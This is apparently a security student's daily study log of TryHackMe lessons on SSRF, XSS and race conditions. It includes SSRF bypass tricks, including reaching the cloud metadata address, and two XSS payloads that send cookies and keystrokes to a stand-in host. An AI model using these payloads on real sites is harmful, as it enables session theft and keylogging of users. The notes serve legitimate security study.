2025-07-18-Friday

오유찬 · July 18, 2025

daily


Day planner


  • CTF || Wargame
  • TryHackMe || HTB || information security engineer (보안기사) certification study ✅ 2025-07-18
  • Security news || reading security papers
  • Algorithm || Python

Daily Log


Study log


TryHackMe

  • Intro to SSRF
    SSRF → Regular SSRF + Blind SSRF
    - &x= : a payload ending in '&x=' stops the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string.
    - Potential SSRF vulnerabilities
    1. A full URL is used in a parameter
    2. A hidden field in a form
    3. A partial URL such as just the hostname (https://website.thm/form?server=api)
    4. Perhaps only the path of the URL
    - Blind SSRF → no output is reflected back to the attacker
    - Need an external HTTP logging tool to monitor requests, such as requestbin.com
    - Deny list → try bypassing it
    - In a cloud environment, the URL holding sensitive data (instance metadata) = 169.254.169.254
    - Allow list → bypass using an allowed URL || attack by creating a site whose name contains the allowed URL
    - Open redirect → try to get redirected while still using an allow-listed URL.
    - https://website.thm/link?url=https://tryhackme.com
    - Trick : x/../

  • XSS (Cross-Site Scripting)
    - Session Stealing : <script>fetch('https://hacker.thm/steal?cookie='+btoa(document.cookie));</script>
    - Key Logger : <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
    - Reflected XSS (where the input comes from)
      - Parameters in the URL query string
      - URL file path
      - Sometimes HTTP headers
    - Stored XSS (where the payload is saved)
      - Comments on a blog
      - User profile information
      - Website listings
    - DOM (Document Object Model) Based XSS
    Definition : where the JS execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website's JS code acts on input or user interaction.
    - window.location.x, eval()
    - Blind XSS
    - Tool : XSS Hunter Express

  • Race Conditions
    - introduction
    - multi-threading
    - race conditions
